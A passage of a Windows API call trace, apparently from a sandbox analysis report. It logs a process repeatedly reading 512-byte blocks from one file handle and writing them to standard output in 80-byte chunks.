returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] GetFileType (hFile=0x4c) returned 0x1 [0218.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.076] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.077] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.077] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] GetFileType (hFile=0x4c) returned 0x1 [0218.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.077] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.078] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.078] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] GetFileType (hFile=0x4c) returned 0x1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.078] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.079] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] GetFileType (hFile=0x4c) returned 0x1 [0218.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.079] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.080] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.080] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] GetFileType (hFile=0x4c) returned 0x1 [0218.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.080] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.081] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.081] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] GetFileType (hFile=0x4c) returned 0x1 [0218.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.081] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] GetFileType (hFile=0x4c) returned 0x1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] GetFileType (hFile=0x4c) returned 0x1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] GetFileType (hFile=0x4c) returned 0x1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] GetFileType (hFile=0x4c) returned 0x1 [0218.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.145] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.146] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.146] GetFileType (hFile=0x4c) returned 0x1 [0218.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.147] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.147] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesRead=0x24de30*=0x200, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec40*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ec90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ec90*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ece0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ece0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed30*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24ed80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ed80*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] WriteFile (in: hFile=0x4c, lpBuffer=0x24edd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24edd0*, lpNumberOfBytesWritten=0x24de24*=0x50, lpOverlapped=0x0) returned 1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.147] GetFileType (hFile=0x4c) returned 0x1 [0218.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0218.148] WriteFile (in: hFile=0x4c, lpBuffer=0x24ee20*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24de24, lpOverlapped=0x0 | out: lpBuffer=0x24ee20*, lpNumberOfBytesWritten=0x24de24*=0x20, lpOverlapped=0x0) returned 1 [0218.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.148] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24de10 | out: lpNewFilePointer=0x0) returned 1 [0218.148] _get_osfhandle (_FileHandle=4) returned 0x54 [0218.148] ReadFile (in: hFile=0x54, lpBuffer=0x24ec40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24de30, 